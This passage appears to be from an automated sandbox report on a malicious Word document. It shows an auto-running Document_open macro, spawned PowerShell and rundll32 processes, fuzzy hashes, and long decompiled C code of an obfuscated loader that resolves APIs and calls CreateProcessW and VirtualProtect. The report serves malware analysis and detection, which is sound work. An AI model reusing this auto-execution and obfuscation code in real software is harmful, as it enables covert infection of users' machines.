                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: xJhvfW

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: GetObject

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: vXvXQH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: AnoeDGEY

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: BBnudDV

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Mid

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Len

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: TYMfJE

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: zzXfBb

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ppqanE

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Create

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: S2xsub800b7

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Tl85j6j2gy2n7qad

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: uFHXMGsDH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: UupSwG

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: wbcoCJA

                                                                    LineInstructionMeta Information
                                                                    9

                                                                    Private Sub Document_open()

                                                                    10

                                                                    Xusmagx95iuck_o3o

                                                                    executed
                                                                    11

                                                                    End Sub

                                                                    Reset < >

                                                                      Analysis Process: powershell.exe PID: 2584 Parent PID: 2372 powershell.exeCOMMON

                                                                      Executed Functions

                                                                      Function 000007FF00282B3C, Relevance: .5, Instructions: 466COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2097563705.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bdc96b8c65de0b725ff5426499c5f654441a00d50ae414a797adbff6ee43f763
                                                                      • Instruction ID: 5ebc185c2b84f5a852e67e9bd5824cbad50274801388645e17580b07abff862d
                                                                      • Opcode Fuzzy Hash: bdc96b8c65de0b725ff5426499c5f654441a00d50ae414a797adbff6ee43f763
                                                                      • Instruction Fuzzy Hash: EAA16B2150EBC64FE7435B386C656A07FB0EF17210F0A05EBD488CB1E3EA585E5AC762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000007FF00280789, Relevance: .3, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2097563705.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d822a2a8fcd97c8352315b0219902b328ae58b28de297b41f167b1d96d4a2c41
                                                                      • Instruction ID: 3d5e795e130de2e59b9cea704e94b6ccb392ba7b7ccda88ecf360a0ad00ca42b
                                                                      • Opcode Fuzzy Hash: d822a2a8fcd97c8352315b0219902b328ae58b28de297b41f167b1d96d4a2c41
                                                                      • Instruction Fuzzy Hash: 61716F2150EBC64FD74397789CA56A07FF0AF17210B1A01E7D484CF0B3D9589D9AC7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000007FF00282609, Relevance: .1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2097563705.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 641a1ebea02ebccdd536f23d5065a6533451b9841e6e0e1183417613bb443fb0
                                                                      • Instruction ID: e90022f8f31c58b946323e89463c09e50d0dcef0e44ad47be9ce8d5af060cba5
                                                                      • Opcode Fuzzy Hash: 641a1ebea02ebccdd536f23d5065a6533451b9841e6e0e1183417613bb443fb0
                                                                      • Instruction Fuzzy Hash: 1831B26184E3C24FD7035B395C656907FB0AF63254B0A06DBD4C5CF0B3E6591AAEC362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000007FF00282CC5, Relevance: .1, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2097563705.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57913ecb7b3554fc921ce8f1c1f7feeead7b4ddeb7231eced2ed8ba6e850d1f6
                                                                      • Instruction ID: 0a5e4a6b50310b97e5346e99e0921ba6b6693db207161fd5a9cad32330d9b61e
                                                                      • Opcode Fuzzy Hash: 57913ecb7b3554fc921ce8f1c1f7feeead7b4ddeb7231eced2ed8ba6e850d1f6
                                                                      • Instruction Fuzzy Hash: DA318B21A1EBC64FE74757386C657B07FA0EF17211F4A01E7D448CB1A3D9089D99C3A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000007FF002826A1, Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2097563705.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87e6546e8621b711353ae823087419c4066c2b2efb7f179abef31cf692050c00
                                                                      • Instruction ID: 8db31860c4493e87f69032533168846700d10bfe53ea88ea028f0190a69004f0
                                                                      • Opcode Fuzzy Hash: 87e6546e8621b711353ae823087419c4066c2b2efb7f179abef31cf692050c00
                                                                      • Instruction Fuzzy Hash: F9119E6184E7C24FD30357386D666907FB0AF53254B4A06DBD8C5CF0B3E1591A6AC363
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2688 Parent PID: 2712 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:1.7%
                                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                                      Signature Coverage:28.8%
                                                                      Total number of Nodes:73
                                                                      Total number of Limit Nodes:5

                                                                      Graph

                                                                      execution_graph 31196 1ff99ef 31197 1ff9ab9 31196->31197 31198 1ff9a92 31196->31198 31202 200a0f1 31198->31202 31213 200a681 31202->31213 31207 200a883 31226 1ff6417 31207->31226 31209 1ff5dfc GetPEB 31209->31213 31211 1ff9aa5 31211->31197 31215 20004c7 31211->31215 31213->31207 31213->31209 31213->31211 31214 2000d6d GetPEB 31213->31214 31218 1ff7f4b 31213->31218 31222 1ff471a 31213->31222 31236 2000dc5 GetPEB 31213->31236 31237 1ff5755 31213->31237 31241 1ffdfd8 GetPEB 31213->31241 31242 1ffa4d7 GetPEB 31213->31242 31214->31213 31216 1ff7378 GetPEB 31215->31216 31217 200055b ExitProcess 31216->31217 31217->31197 31219 1ff7f64 31218->31219 31243 1ff7378 31219->31243 31223 1ff4740 31222->31223 31224 1ff7378 GetPEB 31223->31224 31225 1ff47d8 SHGetFolderPathW 31224->31225 31225->31213 31227 1ff6445 31226->31227 31228 1ff5755 GetPEB 31227->31228 31229 1ff668d 31228->31229 31251 200b86e 31229->31251 31231 1ff66c9 31232 1ff66d4 31231->31232 31255 1fff1ed GetPEB 31231->31255 31232->31211 31234 1ff66f4 31256 1fff1ed GetPEB 31234->31256 31236->31213 31238 1ff576d 31237->31238 31257 20009b8 31238->31257 31241->31213 31242->31213 31244 1ff7464 31243->31244 31248 1ff7490 lstrcmpiW 31243->31248 31249 2000223 GetPEB 31244->31249 31246 1ff747a 31250 200c4dd GetPEB 31246->31250 31248->31213 31249->31246 31250->31248 31252 200b8aa 31251->31252 31253 1ff7378 GetPEB 31252->31253 31254 200b92d CreateProcessW 31253->31254 31254->31231 31255->31234 31256->31232 31258 20009d1 31257->31258 31261 200e232 31258->31261 31262 200e24d 31261->31262 31263 1ff7378 GetPEB 31262->31263 31264 1ff57cc 31263->31264 31264->31213 31265 24f090 31266 24f0b5 31265->31266 31271 24e620 31266->31271 31268 24f1bf 31274 24eb40 VirtualProtect 31268->31274 31270 24f1f8 31272 24e661 31271->31272 31273 24e694 VirtualAlloc 31272->31273 31273->31268 31276 24eb95 31274->31276 31275 24ede6 31275->31270 31276->31275 31277 24edb8 VirtualProtect 31276->31277 31277->31276 31278 2053928 31279 2053972 31278->31279 31280 20539bd GetEnhMetaFileA 31279->31280 31281 20539cc VirtualAlloc 31280->31281 31283 2053acf 31281->31283 31284 2051638 31285 2051643 DdeInitializeA 31284->31285 31287 2051695 31285->31287 31290 2051a14 31287->31290 31295 2051ac8 31290->31295 31294 20516d6 31296 2051ad2 31295->31296 31297 2051a34 DdeCreateStringHandleA DdeNameService 31295->31297 31298 2051ae0 DdeFreeStringHandle 31296->31298 31297->31294 31298->31297

                                                                      Executed Functions

                                                                      Function 0200A0F1, Relevance: 20.4, Strings: 16, Instructions: 365COMMONCrypto
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 91%
                                                                      			E0200A0F1() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _t405;
				signed short* _t412;
				signed int* _t413;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t428;
				signed int* _t457;
				void* _t458;
				signed int _t462;
				signed short* _t465;
				signed int* _t466;

				_t466 =  &_v1732;
				_v1572 = 0x462649;
				_v1568 = 0x666e6d;
				_t413 = 0;
				_v1564 = 0;
				_v1636 = 0x6ea1;
				_v1636 = _v1636 | 0xcaeb1c54;
				_v1636 = _v1636 * 0x44;
				_t458 = 0x1c8a6667;
				_v1636 = _v1636 ^ 0xe68db93d;
				_v1700 = 0x9ea9;
				_v1700 = _v1700 << 0xa;
				_t462 = 0x2b;
				_t415 = 0x23;
				_v1700 = _v1700 * 0x64;
				_v1700 = _v1700 >> 0xc;
				_v1700 = _v1700 ^ 0x000f2063;
				_v1668 = 0xf2a5;
				_v1668 = _v1668 ^ 0x17163b96;
				_v1668 = _v1668 ^ 0xad5f2e4e;
				_v1668 = _v1668 ^ 0xba49bcd9;
				_v1624 = 0xe487;
				_v1624 = _v1624 | 0xeb9c80de;
				_v1624 = _v1624 ^ 0xeb9c9144;
				_v1592 = 0x3881;
				_v1592 = _v1592 * 0x6f;
				_v1592 = _v1592 ^ 0x0018105e;
				_v1724 = 0x49ba;
				_v1724 = _v1724 + 0xaf0;
				_v1724 = _v1724 / _t462;
				_v1724 = _v1724 << 6;
				_v1724 = _v1724 ^ 0x00003deb;
				_v1612 = 0xba93;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x2ea4e5a5;
				_v1652 = 0x4b77;
				_v1652 = _v1652 | 0x65810647;
				_v1652 = _v1652 >> 4;
				_v1652 = _v1652 ^ 0x065805b9;
				_v1588 = 0xa186;
				_v1588 = _v1588 + 0xb5c;
				_v1588 = _v1588 ^ 0x0000a1c8;
				_v1680 = 0xcda8;
				_v1680 = _v1680 * 0x54;
				_v1680 = _v1680 << 0xa;
				_v1680 = _v1680 ^ 0x0deca729;
				_v1716 = 0x462e;
				_v1716 = _v1716 ^ 0x8d5a910e;
				_v1716 = _v1716 + 0xffff4390;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 ^ 0x56868d11;
				_v1708 = 0x2567;
				_v1708 = _v1708 << 0x10;
				_v1708 = _v1708 | 0xd57d8b4f;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0f57bf90;
				_v1604 = 0xb0f8;
				_v1604 = _v1604 + 0xffffeab4;
				_v1604 = _v1604 ^ 0x000092c0;
				_v1576 = 0x7d09;
				_v1576 = _v1576 << 1;
				_v1576 = _v1576 ^ 0x0000cf25;
				_v1656 = 0x9d96;
				_v1656 = _v1656 / _t415;
				_v1656 = _v1656 >> 4;
				_v1656 = _v1656 ^ 0x00003825;
				_v1728 = 0xae64;
				_v1728 = _v1728 >> 0x10;
				_t416 = 0x3c;
				_v1728 = _v1728 * 0x3d;
				_v1728 = _v1728 * 0x64;
				_v1728 = _v1728 ^ 0x0000360d;
				_v1672 = 0x87c;
				_v1672 = _v1672 * 0x4c;
				_v1672 = _v1672 | 0xb9377e8f;
				_v1672 = _v1672 ^ 0xb937fee9;
				_v1596 = 0x755f;
				_v1596 = _v1596 << 3;
				_v1596 = _v1596 ^ 0x0003dbc7;
				_v1580 = 0x3e57;
				_v1580 = _v1580 / _t416;
				_v1580 = _v1580 ^ 0x000011a5;
				_v1732 = 0x638d;
				_v1732 = _v1732 ^ 0xa21d193e;
				_v1732 = _v1732 ^ 0x99b9aab2;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 ^ 0x93405e44;
				_v1644 = 0x6fb3;
				_v1644 = _v1644 >> 0xe;
				_v1644 = _v1644 >> 0xa;
				_v1644 = _v1644 ^ 0x00001043;
				_v1584 = 0x2384;
				_v1584 = _v1584 | 0x2b24236c;
				_v1584 = _v1584 ^ 0x2b240980;
				_v1664 = 0xc490;
				_v1664 = _v1664 + 0xffffef59;
				_t417 = 0x46;
				_v1664 = _v1664 * 0x1f;
				_v1664 = _v1664 ^ 0x0015d474;
				_v1676 = 0x3daf;
				_v1676 = _v1676 * 0x74;
				_v1676 = _v1676 << 0x10;
				_v1676 = _v1676 ^ 0xf34c4f53;
				_v1684 = 0x7c37;
				_v1684 = _v1684 << 0x10;
				_v1684 = _v1684 ^ 0xee095b2d;
				_v1684 = _v1684 ^ 0x923e0ee4;
				_v1688 = 0xf4a0;
				_v1688 = _v1688 ^ 0x2a95b5f1;
				_v1688 = _v1688 | 0x3f378004;
				_v1688 = _v1688 ^ 0x3fb7c4e0;
				_v1720 = 0x3554;
				_v1720 = _v1720 + 0xcba6;
				_v1720 = _v1720 / _t417;
				_t418 = 0x29;
				_v1720 = _v1720 * 0x6e;
				_v1720 = _v1720 ^ 0x00018d2b;
				_v1692 = 0xb003;
				_v1692 = _v1692 * 0x21;
				_v1692 = _v1692 / _t418;
				_v1692 = _v1692 ^ 0x0000dafa;
				_v1608 = 0x9556;
				_v1608 = _v1608 << 6;
				_v1608 = _v1608 ^ 0x0025285b;
				_v1712 = 0x7c63;
				_v1712 = _v1712 + 0xd61;
				_v1712 = _v1712 | 0xf93ff987;
				_v1712 = _v1712 + 0xffff3f2f;
				_v1712 = _v1712 ^ 0xf93f3a22;
				_v1616 = 0xf4ab;
				_t419 = 6;
				_v1616 = _v1616 * 0x6e;
				_v1616 = _v1616 ^ 0x00690dca;
				_v1620 = 0x70bb;
				_v1620 = _v1620 + 0x70ef;
				_v1620 = _v1620 ^ 0x0000b67e;
				_v1704 = 0x2bc1;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 >> 8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 ^ 0x000077dd;
				_v1648 = 0x7a74;
				_v1648 = _v1648 + 0xffff7142;
				_v1648 = _v1648 + 0xffff0d10;
				_v1648 = _v1648 ^ 0xfffe8588;
				_v1660 = 0x319c;
				_v1660 = _v1660 / _t419;
				_v1660 = _v1660 + 0xffff3bc4;
				_v1660 = _v1660 ^ 0xffff411a;
				_v1632 = 0x6a97;
				_v1632 = _v1632 / _t462;
				_v1632 = _v1632 + 0xf6cf;
				_v1632 = _v1632 ^ 0x0000a388;
				_v1640 = 0x6bc7;
				_t420 = 0x28;
				_v1640 = _v1640 / _t420;
				_t421 = 0x51;
				_v1640 = _v1640 / _t421;
				_v1640 = _v1640 ^ 0x000021dd;
				_v1628 = 0x3b39;
				_v1628 = _v1628 | 0xa29391b9;
				_v1628 = _v1628 ^ 0xa293ed86;
				_v1600 = 0xe9c9;
				_v1600 = _v1600 + 0xffff6249;
				_v1600 = _v1600 ^ 0x000034d4;
				_v1696 = 0xf82d;
				_v1696 = _v1696 << 0xc;
				_v1696 = _v1696 + 0xffffa8ef;
				_t422 = 0x63;
				_t465 = _v1628;
				_v1696 = _v1696 / _t422;
				_v1696 = _v1696 ^ 0x002844a7;
				while(_t458 != 0x441c66b) {
					if(_t458 == 0x6f1be5d) {
						_push(0x1ff14a4);
						_push(_v1588);
						_push(_v1652);
						_t405 = E01FF7F4B( &_v1560, _v1680, E01FF5DFC(_v1724, _v1612, __eflags), _v1716, _v1708); // executed
						asm("sbb edi, edi");
						_t422 = _v1604;
						_t458 = ( ~_t405 & 0xd90426a5) + 0x2b3d9fc6;
						E02000D6D(_t422, _v1576, _v1656, _t404);
						_t466 =  &(_t466[8]);
						goto L20;
					} else {
						if(_t458 == 0x1c8a6667) {
							_t422 = _v1700;
							E01FF5755(_t422,  &_v1560, _v1668, _v1624, 0x208);
							_t466 =  &(_t466[3]);
							_t458 = 0x289b3cf5;
							continue;
						} else {
							if(_t458 == 0x289b3cf5) {
								_t465 = E02000DC5();
								_t458 = 0x3ab6a711;
								continue;
							} else {
								if(_t458 == 0x2c7788d8) {
									_push(_t413);
									_push(_t465);
									_push(_v1696);
									_push(_v1600);
									_push(_v1628);
									_push(_v1640);
									_push(_t413);
									_push(_t413);
									E01FF6417(_v1632, __eflags);
									_t413 = 1;
									__eflags = 1;
								} else {
									if(_t458 != 0x3ab6a711) {
										L20:
										__eflags = _t458 - 0x2b3d9fc6;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_t412 = _t465;
										if( *_t465 != _t413) {
											do {
												if( *_t412 == 0x2c) {
													_t457 =  &_v1560;
													while(1) {
														_t412 =  &(_t412[1]);
														_t428 =  *_t412 & 0x0000ffff;
														if(_t428 == 0) {
															break;
														}
														__eflags = _t428 - 0x20;
														if(__eflags != 0) {
															 *_t457 = _t428;
															_t457 =  &(_t457[0]);
															__eflags = _t457;
															continue;
														}
														break;
													}
													_t422 = 0;
													 *_t457 = 0;
												}
												_t412 =  &(_t412[1]);
											} while ( *_t412 != _t413);
										}
										_t458 = 0x6f1be5d;
										continue;
									}
								}
							}
						}
					}
					return _t413;
				}
				_push(_t422);
				E01FF471A(_v1636,  &_v520, _v1728, _v1672, _v1596, _v1580, _v1732); // executed
				E01FFDFD8(_v1644,  &_v1040, __eflags, _v1584, _v1664);
				_push(0x1ff14d4);
				_push(_v1720);
				_push(_v1688);
				E01FFA4D7(__eflags, _v1608, _v1712, _v1616, _v1620, E01FF5DFC(_v1676, _v1684, __eflags),  &_v520, _t465,  &_v1040);
				_t422 = _v1704;
				E02000D6D(_t422, _v1648, _v1660, _t399);
				_t466 =  &(_t466[0x17]);
				_t458 = 0x2c7788d8;
				goto L20;
			}


































































                                                                      0x0200a0f1
                                                                      0x0200a0f7
                                                                      0x0200a104
                                                                      0x0200a110
                                                                      0x0200a112
                                                                      0x0200a119
                                                                      0x0200a121
                                                                      0x0200a133
                                                                      0x0200a137
                                                                      0x0200a13c
                                                                      0x0200a144
                                                                      0x0200a14c
                                                                      0x0200a156
                                                                      0x0200a159
                                                                      0x0200a15a
                                                                      0x0200a15e
                                                                      0x0200a163
                                                                      0x0200a16b
                                                                      0x0200a173
                                                                      0x0200a17b
                                                                      0x0200a183
                                                                      0x0200a18b
                                                                      0x0200a193
                                                                      0x0200a19b
                                                                      0x0200a1a3
                                                                      0x0200a1b6
                                                                      0x0200a1bd
                                                                      0x0200a1c8
                                                                      0x0200a1d0
                                                                      0x0200a1e0
                                                                      0x0200a1e4
                                                                      0x0200a1e9
                                                                      0x0200a1f1
                                                                      0x0200a1fc
                                                                      0x0200a204
                                                                      0x0200a20f
                                                                      0x0200a217
                                                                      0x0200a21f
                                                                      0x0200a224
                                                                      0x0200a22c
                                                                      0x0200a237
                                                                      0x0200a242
                                                                      0x0200a24d
                                                                      0x0200a25a
                                                                      0x0200a25e
                                                                      0x0200a263
                                                                      0x0200a26b
                                                                      0x0200a273
                                                                      0x0200a27b
                                                                      0x0200a283
                                                                      0x0200a288
                                                                      0x0200a290
                                                                      0x0200a298
                                                                      0x0200a29d
                                                                      0x0200a2a5
                                                                      0x0200a2aa
                                                                      0x0200a2b2
                                                                      0x0200a2bd
                                                                      0x0200a2c8
                                                                      0x0200a2d3
                                                                      0x0200a2de
                                                                      0x0200a2e5
                                                                      0x0200a2f0
                                                                      0x0200a2fe
                                                                      0x0200a302
                                                                      0x0200a307
                                                                      0x0200a30f
                                                                      0x0200a319
                                                                      0x0200a325
                                                                      0x0200a328
                                                                      0x0200a331
                                                                      0x0200a335
                                                                      0x0200a33d
                                                                      0x0200a34a
                                                                      0x0200a34e
                                                                      0x0200a356
                                                                      0x0200a35e
                                                                      0x0200a369
                                                                      0x0200a371
                                                                      0x0200a37c
                                                                      0x0200a392
                                                                      0x0200a399
                                                                      0x0200a3a4
                                                                      0x0200a3ac
                                                                      0x0200a3b4
                                                                      0x0200a3bc
                                                                      0x0200a3c1
                                                                      0x0200a3c9
                                                                      0x0200a3d1
                                                                      0x0200a3d6
                                                                      0x0200a3db
                                                                      0x0200a3e3
                                                                      0x0200a3ee
                                                                      0x0200a3f9
                                                                      0x0200a404
                                                                      0x0200a40c
                                                                      0x0200a419
                                                                      0x0200a41c
                                                                      0x0200a420
                                                                      0x0200a428
                                                                      0x0200a435
                                                                      0x0200a439
                                                                      0x0200a43e
                                                                      0x0200a446
                                                                      0x0200a44e
                                                                      0x0200a453
                                                                      0x0200a45b
                                                                      0x0200a463
                                                                      0x0200a46b
                                                                      0x0200a473
                                                                      0x0200a47b
                                                                      0x0200a483
                                                                      0x0200a48b
                                                                      0x0200a49b
                                                                      0x0200a4a4
                                                                      0x0200a4a5
                                                                      0x0200a4a9
                                                                      0x0200a4b1
                                                                      0x0200a4be
                                                                      0x0200a4c8
                                                                      0x0200a4cc
                                                                      0x0200a4d4
                                                                      0x0200a4df
                                                                      0x0200a4e7
                                                                      0x0200a4f2
                                                                      0x0200a4fa
                                                                      0x0200a502
                                                                      0x0200a50a
                                                                      0x0200a512
                                                                      0x0200a51c
                                                                      0x0200a531
                                                                      0x0200a534
                                                                      0x0200a53b
                                                                      0x0200a546
                                                                      0x0200a551
                                                                      0x0200a55c
                                                                      0x0200a567
                                                                      0x0200a56f
                                                                      0x0200a574
                                                                      0x0200a579
                                                                      0x0200a57e
                                                                      0x0200a586
                                                                      0x0200a58e
                                                                      0x0200a596
                                                                      0x0200a59e
                                                                      0x0200a5a6
                                                                      0x0200a5b6
                                                                      0x0200a5ba
                                                                      0x0200a5c2
                                                                      0x0200a5ca
                                                                      0x0200a5da
                                                                      0x0200a5de
                                                                      0x0200a5e6
                                                                      0x0200a5ee
                                                                      0x0200a5fa
                                                                      0x0200a5ff
                                                                      0x0200a609
                                                                      0x0200a60e
                                                                      0x0200a614
                                                                      0x0200a61c
                                                                      0x0200a624
                                                                      0x0200a62c
                                                                      0x0200a634
                                                                      0x0200a63f
                                                                      0x0200a64a
                                                                      0x0200a655
                                                                      0x0200a65d
                                                                      0x0200a662
                                                                      0x0200a66e
                                                                      0x0200a671
                                                                      0x0200a675
                                                                      0x0200a679
                                                                      0x0200a681
                                                                      0x0200a693
                                                                      0x0200a74b
                                                                      0x0200a750
                                                                      0x0200a757
                                                                      0x0200a781
                                                                      0x0200a796
                                                                      0x0200a798
                                                                      0x0200a7a5
                                                                      0x0200a7ab
                                                                      0x0200a7b0
                                                                      0x00000000
                                                                      0x0200a699
                                                                      0x0200a69f
                                                                      0x0200a735
                                                                      0x0200a739
                                                                      0x0200a73e
                                                                      0x0200a741
                                                                      0x00000000
                                                                      0x0200a6a1
                                                                      0x0200a6a7
                                                                      0x0200a712
                                                                      0x0200a714
                                                                      0x00000000
                                                                      0x0200a6a9
                                                                      0x0200a6af
                                                                      0x0200a883
                                                                      0x0200a884
                                                                      0x0200a885
                                                                      0x0200a889
                                                                      0x0200a890
                                                                      0x0200a897
                                                                      0x0200a8a5
                                                                      0x0200a8a6
                                                                      0x0200a8a7
                                                                      0x0200a8b1
                                                                      0x0200a8b1
                                                                      0x0200a6b5
                                                                      0x0200a6bb
                                                                      0x0200a875
                                                                      0x0200a875
                                                                      0x0200a87b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200a881
                                                                      0x0200a6c1
                                                                      0x0200a6c1
                                                                      0x0200a6c7
                                                                      0x0200a6c9
                                                                      0x0200a6cd
                                                                      0x0200a6cf
                                                                      0x0200a6e4
                                                                      0x0200a6e4
                                                                      0x0200a6e7
                                                                      0x0200a6ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200a6d8
                                                                      0x0200a6dc
                                                                      0x0200a6de
                                                                      0x0200a6e1
                                                                      0x0200a6e1
                                                                      0x00000000
                                                                      0x0200a6e1
                                                                      0x00000000
                                                                      0x0200a6dc
                                                                      0x0200a6ef
                                                                      0x0200a6f1
                                                                      0x0200a6f1
                                                                      0x0200a6f4
                                                                      0x0200a6f7
                                                                      0x0200a6c9
                                                                      0x0200a6fc
                                                                      0x00000000
                                                                      0x0200a6fc
                                                                      0x0200a6bb
                                                                      0x0200a6af
                                                                      0x0200a6a7
                                                                      0x0200a69f
                                                                      0x0200a8be
                                                                      0x0200a8be
                                                                      0x0200a7b8
                                                                      0x0200a7e2
                                                                      0x0200a800
                                                                      0x0200a805
                                                                      0x0200a80a
                                                                      0x0200a80e
                                                                      0x0200a850
                                                                      0x0200a864
                                                                      0x0200a868
                                                                      0x0200a86d
                                                                      0x0200a870
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
                                                                      • API String ID: 0-3673879503
                                                                      • Opcode ID: 8106242799d15f09af9d7001ad3407363d231666fc1727519f0f3111bcb3efc3
                                                                      • Instruction ID: ce95fe71b732d593927a94e086707e6dc9acb994e2c4e1030390afe4854328fc
                                                                      • Opcode Fuzzy Hash: 8106242799d15f09af9d7001ad3407363d231666fc1727519f0f3111bcb3efc3
                                                                      • Instruction Fuzzy Hash: 3B122271508380CFE369CF65C48AA4BBBF1BBC5748F10891DE2D9862A0D7B98949CF53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF6417, Relevance: .2, Instructions: 181COMMONCrypto
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
